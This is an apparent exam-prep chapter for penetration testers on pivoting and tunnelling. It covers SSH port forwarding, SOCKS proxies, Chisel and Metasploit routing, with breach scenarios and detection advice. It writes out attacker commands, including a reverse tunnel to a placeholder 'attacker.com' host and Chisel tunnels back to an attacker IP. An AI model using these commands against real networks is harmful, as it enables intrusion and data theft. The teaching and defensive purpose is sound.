This chapter covers pivoting and tunnelling techniques essential for post-exploitation in penetration testing. For the PT0-002 exam, understanding how to pivot through compromised hosts to access otherwise unreachable networks is critical, as approximately 10-15% of exam questions touch on lateral movement, pivoting, or tunnelling. You will learn the mechanisms behind SSH tunnelling, port forwarding, SOCKS proxies, and tools like Chisel and Metasploit's pivot module, along with detection and mitigation strategies.
Jump to a section
Imagine a penetration tester is a spy who has compromised a single computer in a secure office building. This computer is like a desk in a cubicle farm with a direct phone line to the outside (the internet) but no direct access to the CEO's office (the internal database). The spy needs to reach the CEO's safe. She can't walk there because security guards (firewalls) block the way. Instead, she uses the compromised computer to build a hidden tunnel—a physical passage through the ventilation system. She crawls through the vents (encrypted traffic) from the cubicle to the CEO's office, bypassing the guards. Once inside, she can open the safe and relay documents back through the vent to her original desk, which then sends them to her handler. In networking terms, the compromised host (cubicle) becomes a pivot point. The vent is an SSH tunnel or a SOCKS proxy. The spy's ability to move through the vent without being seen is akin to using encrypted tunnels to bypass network segmentation. The key mechanic: the spy never leaves the vent; she uses it to forward traffic from her original desk to the CEO's office and back. Similarly, a pivot host forwards packets from the attacker's machine to the target network, making it appear as if the traffic originates from the compromised host, not the attacker.
What is Pivoting and Why Does It Exist?
Pivoting is the technique of using a compromised host (the pivot point) to access other systems that are not directly reachable from the attacker's machine. In a typical penetration test, the attacker's machine is on an external network, while the target internal network is segmented by firewalls, NAT, or VLANs. After compromising a single host (often via phishing or an exposed service), the attacker can use that host as a stepping stone to reach deeper into the network.
Tunnelling is the method of encapsulating traffic from one network protocol inside another to bypass network controls. For example, SSH tunnelling encapsulates arbitrary TCP traffic within an SSH session, which is often allowed through firewalls because SSH (port 22) is commonly permitted for remote administration.
How Pivoting Works Internally
A pivot typically involves three machines: the attacker's machine (A), the compromised host (B, also called the pivot or foothold), and the target internal host (C). The attacker cannot directly reach C due to network segmentation. However, B can reach C because they are on the same internal network. The attacker establishes a tunnel from A to B, then uses B to forward traffic to C.
Consider a scenario where the attacker has a reverse shell on B. From A, the attacker can run commands on B. To access a web server on C (192.168.1.100:80), the attacker can set up local port forwarding on A via SSH to B, mapping a local port (e.g., 8080) to C:80. The command:
ssh -L 8080:192.168.1.100:80 user@BWhen the attacker opens a browser to http://localhost:8080, the SSH client on A listens on port 8080. Any connection to that port is encrypted and sent over the SSH tunnel to B. The SSH server on B decrypts the traffic and opens a new TCP connection to 192.168.1.100:80. The response flows back through the same tunnel. To C, the connection appears to originate from B's IP address, not A's.
Key Components, Values, Defaults, and Timers
SSH Tunnelling: Uses the SSH protocol (RFC 4251). Default port 22. Three types:
Local port forwarding (-L): Listens on a local port and forwards to a remote destination.
Remote port forwarding (-R): Listens on a remote port and forwards to a local destination.
Dynamic port forwarding (-D): Creates a SOCKS proxy on a local port.
SOCKS Proxy: A protocol (RFC 1928) that allows clients to connect to arbitrary TCP/UDP ports through a proxy server. SOCKS5 supports authentication and UDP. Default port 1080.
Chisel: A fast TCP/UDP tunnel over HTTP, using SSH-like encryption. It can bypass firewalls that block SSH. Default port 8080 for the server.
Metasploit pivot: Uses the route add command or the autoroute post-exploitation module to add routes through a compromised session. The session acts as a proxy.
Timers: SSH tunnels have no fixed timeout but can be kept alive with ServerAliveInterval (default 0, disabled). TCP keepalive timers default to 2 hours on many systems. Firewalls often have idle timeouts (e.g., 300 seconds for stateful inspection).
Configuration and Verification Commands
SSH Local Port Forwarding (A -> B -> C):
On attacker machine A:
ssh -L 8080:192.168.1.100:80 user@BVerify with:
netstat -tlnp | grep 8080You should see sshd listening on 127.0.0.1:8080.
SSH Remote Port Forwarding (B -> A -> C):
On attacker A, start SSH with remote forwarding:
ssh -R 8888:192.168.1.100:80 user@BNow on B, connecting to localhost:8888 will forward to A, which then connects to C:80. However, note that by default SSH on B binds to loopback only. To allow other hosts on B's network to use the tunnel, use -R 0.0.0.0:8888:192.168.1.100:80 and set GatewayPorts yes on A's sshd config.
Dynamic Port Forwarding (SOCKS Proxy):
ssh -D 1080 user@BThen configure your browser or tool (e.g., proxychains) to use SOCKS5 proxy at 127.0.0.1:1080. All traffic through the proxy is tunnelled via B.
Using Chisel:
On the attacker (server):
chisel server --port 8080 --reverseOn the compromised host (client):
chisel client <attacker_ip>:8080 R:8000:192.168.1.100:80This creates a reverse tunnel: connections to attacker's port 8000 are forwarded to C:80 via the client.
Metasploit Pivot:
After gaining a Meterpreter session on B:
meterpreter > run autoroute -s 192.168.1.0/24Then background the session and use route to see the added route. Now you can use auxiliary modules or exploit modules against the internal network, and traffic will go through the session.
How Pivoting Interacts with Related Technologies
Firewalls: Pivoting relies on the fact that the compromised host can communicate with internal targets. Firewalls with stateful inspection may allow the return traffic because it matches an existing connection. Deep packet inspection (DPI) can detect tunnelling protocols (e.g., SSH on non-standard ports) and block them.
NAT: If the compromised host is behind NAT, reverse tunnels (where the host initiates the connection to the attacker) are often necessary because the attacker cannot directly connect to the host. This is common in post-exploitation where the host is on a private network.
Network Segmentation: VLANs, ACLs, and micro-segmentation limit pivoting. If the compromised host is in a DMZ with strict egress rules, it may not be able to reach internal hosts. The attacker must then find another way, such as using multiple hops (chained pivots) or exploiting trust relationships.
Endpoint Detection and Response (EDR): Modern EDR tools can detect unusual SSH processes, port forwarding, or unexpected outbound connections. They may flag the creation of a SOCKS proxy or the use of tunnelling tools like Chisel. Attackers often use obfuscation, such as tunnelling over HTTPS (e.g., using socat or stunnel) or using legitimate tools like netsh port forwarding on Windows.
Compromise the Initial Foothold
The first step is to gain access to a host within the target network. This is typically achieved through phishing, exploiting a vulnerability in an internet-facing service, or using stolen credentials. The compromised host becomes the pivot point. At this stage, the attacker has a shell or Meterpreter session on the host. The host must have network connectivity to both the attacker (outbound) and the internal target (inbound). The attacker notes the host's IP address, network interfaces, and routing table to understand which internal networks are reachable. For example, `ipconfig` on Windows or `ip a` on Linux reveals local IPs and gateway.
Assess Network Segmentation and Routes
The attacker maps the internal network from the pivot host. Using commands like `arp -a`, `netstat -rn`, and `route print`, the attacker discovers adjacent subnets and the default gateway. They may also perform port scanning from the pivot host (e.g., using `nmap` via a proxy) to identify live hosts and services. This step determines which targets are accessible and what services are running. The attacker looks for segmentation: if the pivot host can reach 10.0.0.0/8 but not 172.16.0.0/12, they may need to compromise another host in the 172.16.x.x network to pivot further.
Set Up Tunnelling Mechanism
Based on the network layout and firewall rules, the attacker chooses a tunnelling method. If SSH is allowed outbound, they can set up a reverse SSH tunnel from the pivot to the attacker's machine. If SSH is blocked, they might use Chisel over HTTP/HTTPS, or set up a SOCKS proxy using Meterpreter's `portfwd` or `auxiliary/server/socks_proxy`. The attacker ensures the tunnel is encrypted to evade detection. For example, using `ssh -R 4444:127.0.0.1:9999 attacker.com` creates a reverse tunnel where connections to the attacker's port 9999 are forwarded to the pivot's localhost:4444 (which could be a service on the internal network).
Route Traffic Through the Pivot
The attacker configures their local toolchain to use the tunnel. For SOCKS proxies, they set environment variables (e.g., `export http_proxy=socks5://127.0.0.1:1080`) or use tools like `proxychains` to force all traffic through the proxy. For port forwarding, they simply connect to local ports. In Metasploit, they add routes with `route add 10.0.0.0/8 1` (where 1 is the session ID) so that modules targeting that subnet automatically use the session. The attacker then runs scans or exploits against internal targets. The tunnel transparently forwards packets, and the target sees the pivot's IP as the source.
Maintain Access and Chain Pivots
The attacker may need to pivot through multiple hosts to reach a high-value target. This is called chaining. For example, from host A, they tunnel to host B, then from B to C. Each hop adds latency and complexity. Tools like `ssh -J` (jump host) or chaining SOCKS proxies can be used. The attacker must also maintain persistence on each pivot host to avoid losing access if a session dies. They may set up cron jobs or scheduled tasks to re-establish tunnels. Additionally, they monitor for detection: unexpected traffic patterns, new listening ports, or unusual processes. If a tunnel is broken, they quickly re-establish it using a fallback method (e.g., if SSH fails, switch to Chisel).
Enterprise Scenario 1: PCI-Compliant Network Segmentation
A penetration tester is assessing a financial institution that has a strict PCI-DSS compliant network. The corporate network (192.168.1.0/24) is isolated from the cardholder data environment (CDE) (10.0.0.0/8) by a pair of firewalls. The tester successfully phishes an employee in the corporate network, gaining a foothold on a Windows workstation (192.168.1.50). From there, they discover that the workstation can reach a jump box (10.0.0.10) via RDP (port 3389) because IT administrators need to manage the CDE. The tester uses ssh -L 13389:10.0.0.10:3389 user@192.168.1.50 to tunnel RDP through the pivot. They then connect to localhost:13389 with an RDP client, using stolen credentials, and gain access to the jump box. From the jump box, they can reach the database server (10.0.0.100). They set up a second tunnel from the jump box to the database using Meterpreter's portfwd to forward port 1433 (MSSQL) back to their machine. This chained pivot demonstrates how a single foothold can lead to critical assets. In production, such tunnels are often detected by network monitoring tools that see unusual RDP traffic from a workstation to multiple internal hosts, or by endpoint protection that flags the SSH client on a non-admin machine.
Enterprise Scenario 2: Cloud Environment Pivoting
In a cloud penetration test (AWS, Azure, GCP), the attacker compromises a web server in a public subnet. The web server has a public IP and is accessible from the internet. However, the database server is in a private subnet with no direct internet access. The web server can reach the database server via a VPC peering connection. The attacker uses a reverse SSH tunnel from the web server to their own cloud instance (attacker's C2). They configure the tunnel to forward local port 3306 (MySQL) on the web server to the attacker's port 33060. Now the attacker can connect to their own localhost:33060 and it goes through the web server to the database. This bypasses the security group that only allows the web server to access the database. In production, cloud security groups and network ACLs are designed to prevent such pivoting, but if the web server is compromised, the attacker inherits its network permissions. To mitigate, organizations use host-based firewalls (e.g., iptables) on the web server to restrict outbound connections, and implement VPC endpoints or private link to avoid routing through a single host.
Scenario 3: OT/ICS Network Pivoting
In an operational technology (OT) environment, the IT network and OT network are air-gapped. However, a historian server sits in a DMZ and has connections to both networks. The attacker compromises the historian via an unpatched web interface. From the historian, they can reach the OT network's PLCs (programmable logic controllers). The attacker uses Chisel to tunnel Modbus traffic (port 502) over HTTPS, because OT network firewalls often allow HTTPS for software updates. They set up a Chisel server on their C2 and a client on the historian, creating a reverse tunnel from the OT network to the C2. They then use a Modbus client on the C2 to send commands to the PLCs, potentially causing physical damage. In production, OT networks should have deep packet inspection that can detect Modbus over HTTPS anomalies, but many legacy systems lack this capability. The key takeaway is that pivoting in OT environments is extremely dangerous and highlights the need for strict network segmentation and host hardening.
What PT0-002 Tests on Pivoting and Tunnelling
The PT0-002 exam objectives under 3.4 (Pivoting and Tunnelling) focus on the ability to identify and execute pivoting techniques using common tools. You should know:
The difference between local, remote, and dynamic port forwarding in SSH.
How to use Metasploit's route add and autoroute to pivot through a session.
The purpose of SOCKS proxies and how to configure them.
Tools like Chisel, Proxychains, and SSH for tunnelling.
Detection and mitigation strategies (e.g., network segmentation, egress filtering).
Common Wrong Answers and Why Candidates Choose Them
Confusing local and remote forwarding: Candidates often mix up -L and -R. They might think -L forwards from remote to local, or vice versa. The key is: -L listens on the LOCAL machine; -R listens on the REMOTE machine. A common exam question: "You have a shell on a host behind NAT. Which technique allows you to access a service on the internal network?" The wrong answer is often "local port forwarding" because the candidate thinks they need to forward a local port to the internal service. But since the host is behind NAT and cannot be reached directly, you need a reverse tunnel (-R) where the compromised host initiates the connection to your machine.
Thinking pivoting is only for network scanning: Some candidates believe pivoting is only used for port scanning. In reality, pivoting is used for any TCP/UDP communication, including exploitation, data exfiltration, and interactive access.
Assuming all tunnels are encrypted: While SSH tunnels are encrypted, some tools like netcat or socat can create plaintext tunnels. The exam may test that encryption is not inherent to all tunnelling methods.
Misunderstanding SOCKS proxy vs. port forwarding: SOCKS proxies allow dynamic multi-port forwarding, while port forwarding is static. A question might ask: "Which technique allows you to browse multiple websites through a pivot without configuring each port?" The answer is SOCKS proxy, not port forwarding.
Specific Numbers, Values, and Terms to Memorize
SSH default port: 22
SOCKS default port: 1080
Chisel default port: 8080
Metasploit autoroute command syntax: run autoroute -s <subnet>
proxychains configuration file: /etc/proxychains.conf (or proxychains4.conf)
The -N flag in SSH: do not execute a remote command (useful for port forwarding only).
The -f flag: background SSH after authentication.
Edge Cases and Exceptions
Double pivoting: The exam may present a scenario where you need to pivot through two hosts. You need to chain tunnels. For example, use ssh -J (jump host) or set up a SOCKS proxy on the first pivot and then another on the second.
UDP tunnelling: SOCKS5 supports UDP, but many tools only handle TCP. The exam may ask how to tunnel DNS (UDP) through a pivot. Answer: use a SOCKS5 proxy that supports UDP, or encapsulate UDP in TCP (e.g., using socat).
Firewall evasion: If SSH is blocked, you might use HTTP tunnelling (e.g., Chisel, httptunnel) or DNS tunnelling (e.g., iodine). The exam may ask which protocol is most likely to be allowed outbound (answer: DNS or HTTPS).
How to Eliminate Wrong Answers
Read the question carefully: Is the pivot host behind NAT? Then you need a reverse tunnel. Is the goal to access multiple ports? Use a SOCKS proxy. Does the question mention "encrypted"? SSH and Chisel are encrypted; raw netcat is not. Does it mention "dynamic"? That refers to SOCKS. Use the underlying mechanism: if the attacker's machine initiates the connection, it's local forwarding; if the compromised host initiates, it's remote forwarding.
Pivoting uses a compromised host to access networks not directly reachable from the attacker.
SSH local port forwarding (-L) listens on the attacker's machine; remote forwarding (-R) listens on the pivot.
Dynamic port forwarding (-D) creates a SOCKS proxy on the attacker's machine.
Metasploit's `route add` or `autoroute` module enables pivoting through a Meterpreter session.
Chisel is an HTTP-based tunnelling tool that can bypass firewalls blocking SSH.
Proxychains forces any TCP application to use a SOCKS proxy for pivoting.
Detection methods include monitoring for unusual outbound SSH, non-standard ports, and unexpected proxy services.
Mitigation includes strict egress filtering, network segmentation, and host-based firewalls.
These come up on the exam all the time. Here's how to tell them apart.
SSH Local Port Forwarding (-L)
Listens on the local machine (attacker) and forwards to a destination reachable from the remote host.
Used when the attacker can initiate the SSH connection to the pivot.
Syntax: ssh -L [local_port]:[target_host]:[target_port] user@pivot
The target host is specified from the pivot's perspective.
Common for accessing internal services when the pivot is reachable from the attacker.
SSH Remote Port Forwarding (-R)
Listens on the remote machine (pivot) and forwards to a destination reachable from the local machine (attacker).
Used when the pivot is behind NAT and cannot be directly connected to; the pivot initiates the SSH connection.
Syntax: ssh -R [remote_port]:[target_host]:[target_port] user@attacker
The target host is specified from the attacker's perspective.
Common for exfiltration or when the pivot can only make outbound connections.
SOCKS Proxy (Dynamic Forwarding)
Creates a SOCKS proxy on a local port that can handle multiple destinations dynamically.
Syntax: ssh -D [local_port] user@pivot
Allows any TCP connection through the proxy (e.g., web browsing, FTP).
Applications must be configured to use the SOCKS proxy (e.g., via proxychains).
More flexible but may have higher overhead.
Port Forwarding (Static Forwarding)
Forwards a single local port to a single remote destination.
Syntax: ssh -L [local_port]:[target_host]:[target_port] user@pivot
Fixed mapping; only one service per command.
No application configuration needed; just connect to localhost.
Simpler and faster for specific tasks.
Chisel
Tunnels over HTTP/HTTPS, making it harder to block than SSH on port 22.
Uses a client-server model with a single binary; no SSH server required.
Supports reverse and forward tunnels, as well as SOCKS5 proxy.
Default port 8080 (HTTP). Can be run on any port.
Encrypted using SSH-like crypto (Chisel uses Go's crypto library).
SSH Tunnelling
Tunnels over SSH protocol, typically on port 22.
Requires SSH server on the pivot (or client on the attacker for reverse).
Supports local, remote, and dynamic forwarding natively.
Default port 22. Often blocked by egress filters.
Encrypted by default; strong authentication options.
Mistake
Pivoting and tunnelling are the same thing.
Correct
Pivoting is the act of using a compromised host to access otherwise unreachable networks; tunnelling is a method to achieve pivoting by encapsulating traffic. Tunnelling can also be used for other purposes like bypassing firewalls without pivoting.
Mistake
SSH tunnels are always allowed through firewalls.
Correct
Many organizations block outbound SSH (port 22) to prevent tunnelling. Attackers then use SSH on port 443 or use other protocols like HTTPS (Chisel) or DNS.
Mistake
You can only pivot through one host at a time.
Correct
Pivoting can be chained through multiple hosts. For example, through host A to host B to host C. Tools like SSH jump hosts (`-J`) or nested SOCKS proxies support this.
Mistake
Metasploit's autoroute automatically tunnels all traffic.
Correct
Autoroute only adds routes within Metasploit's context. It does not create a system-wide proxy. You need to use `portfwd` or a SOCKS proxy module to tunnel traffic from external tools.
Mistake
Proxychains works with all applications.
Correct
Proxychains only works with applications that use TCP and resolve DNS through the proxy. Some applications (e.g., those using raw sockets or UDP) may not work. Proxychains4 (proxychains-ng) improves support.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Local port forwarding (-L) listens on your local machine and forwards connections to a destination reachable from the remote host. You use it when you can SSH to the remote host. Remote port forwarding (-R) listens on the remote host and forwards connections to a destination reachable from your local machine. You use it when the remote host is behind NAT and cannot be directly connected to; the remote host initiates the SSH connection. For example, `ssh -L 8080:internal:80 user@pivot` forwards localhost:8080 to internal:80 via pivot. `ssh -R 8080:localhost:80 user@attacker` forwards pivot's port 8080 to attacker's localhost:80.
You can chain pivots by using a SOCKS proxy on the first pivot and then configuring the second pivot to use that proxy, or by using SSH jump hosts with the `-J` flag. For example: `ssh -J user@pivot1 user@pivot2` creates a connection to pivot2 via pivot1. Alternatively, set up a SOCKS proxy on pivot1 (`ssh -D 1080 user@pivot1`), then on pivot2, use `proxychains ssh user@pivot2` to route through the proxy. You can also nest tunnels by forwarding ports from one pivot to another.
When SSH is blocked, you can use tools like Chisel (HTTP tunnelling), socat (to encapsulate traffic), stunnel (SSL tunnelling), or even DNS tunnelling with iodine. Chisel is particularly popular because it uses HTTP/HTTPS, which is often allowed outbound. You can also use Metasploit's `portfwd` over a reverse HTTP or HTTPS payload if you have a Meterpreter session.
Proxychains intercepts network calls from an application and routes them through a proxy chain (e.g., SOCKS5). It uses LD_PRELOAD to hook socket functions. Configuration is in `/etc/proxychains.conf` (or `proxychains4.conf`). You specify the proxy type (socks4, socks5, http) and address. For example: `socks5 127.0.0.1 1080`. Then run `proxychains nmap -sT 10.0.0.1`. Proxychains forces all TCP connections through the proxy. Note: it does not work with UDP or raw sockets by default.
A SOCKS proxy operates at layer 5 (session) and forwards individual TCP connections. It does not provide full network-layer access; only applications configured to use the proxy can tunnel. A VPN (e.g., OpenVPN) creates a virtual network interface at layer 3, routing all IP traffic from the host through the tunnel. For pivoting, a SOCKS proxy is lighter and easier to set up from a compromised host, but a VPN provides full network access including UDP and non-TCP protocols. However, setting up a VPN on a compromised host is more complex and may be detected.
Detection methods include: monitoring for outbound SSH connections from non-admin workstations; looking for SSH on non-standard ports; detecting the presence of tunnelling tools (Chisel, socat) via file integrity monitoring or process lists; analyzing network flows for unusual patterns (e.g., a workstation connecting to many internal hosts on various ports); and using deep packet inspection to identify encapsulated traffic (e.g., HTTP with non-HTTP payloads). Endpoint detection and response (EDR) solutions can also flag the creation of proxy services or port forwarding rules.
The `-N` flag tells SSH not to execute any remote command. It is used when you only want to set up port forwarding and do not need an interactive shell. This is useful for background tunnels where you just want the forwarding to happen. For example: `ssh -N -L 8080:localhost:80 user@pivot`. This reduces overhead and prevents unintended command execution.
You've just covered Pivoting and Tunnelling Through Networks — now see how well it sticks with free PT0-002 practice questions. Full explanations included, no account needed.
Done with this chapter?